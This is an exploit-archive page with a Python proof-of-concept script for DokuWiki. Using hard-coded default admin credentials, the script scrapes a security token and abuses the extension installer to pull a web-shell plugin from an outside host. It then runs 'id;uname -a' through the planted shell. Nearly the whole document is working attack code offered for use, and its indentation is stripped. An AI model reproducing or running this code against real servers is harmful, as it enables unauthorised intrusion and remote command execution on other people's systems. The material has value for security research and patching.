DokuWiki Proof Of Concept Shell Upload

This proof of concept code shows how administrative functionality can be abused in DokuWiki to upload a shell.


MD5 | 729d40f68a98bc4c5c3dc2afec215396

c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py
#!/usr/bin/env python
# shell-dokuwiki.py - module to upload shell, based on previous version
# created 28.04.2017. Bug ('feature') is exploitable only
# when you will have a valid credentials.
# for this proof-of-concept you'll also need host with you.r/shell.zip
#

import sys
import re
import requests

print '[+] Module : dokuwiki - started.'

print
target = raw_input("[+] Hostname> ")
logMe = target + '/doku.php?id=start&do=login&sectok='
print

session = requests.session()
login_data = dict(u='user', p='bitnami')
req = session.post(logMe, data=login_data)

# 2nd req:
afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install'
req2 = session.get(afterPage)

resp = req2.text
if 'Log Out' in resp:
print '[+] We are logged-in as admin. Preparing shell...'


req3 = session.get(afterPage)
resp3 = req3.text

pattern = re.compile('<input type="hidden" name="sectok" value="(.*?)"/>')
found = re.search(pattern, resp3)

if found:
sectok = found.group(1)
print '[+] Found "sectok":' + str( sectok )
print '[+] Preparing shell params to upload'

data_shell = {
'sectok':sectok,
'installurl':'http://192.168.1.205/mishell.zip'
}
reqshell = session.post(afterPage, data=data_shell)
respshell = reqshell.text

md5name = re.compile('<div class="success">Plugin (.*?) installed successfully</div>')
foundmishell = re.search(md5name, respshell)

if foundmishell:
print '[+] Mishell name:' + str( foundmishell.group(1))

shellUrl = target + '/lib/plugins/'+foundmishell.group(1)+'/mishell.php?x=id;uname -a'
verify = session.get(shellUrl)
vtext = verify.text

print ' ',vtext
print ''
print '[+] Your shell should be here:', shellUrl

## can not log in
else:
print '[-] Can not login. Something is wrong :C'


print '[+] Module : dokuwiki - finished.'


Related Posts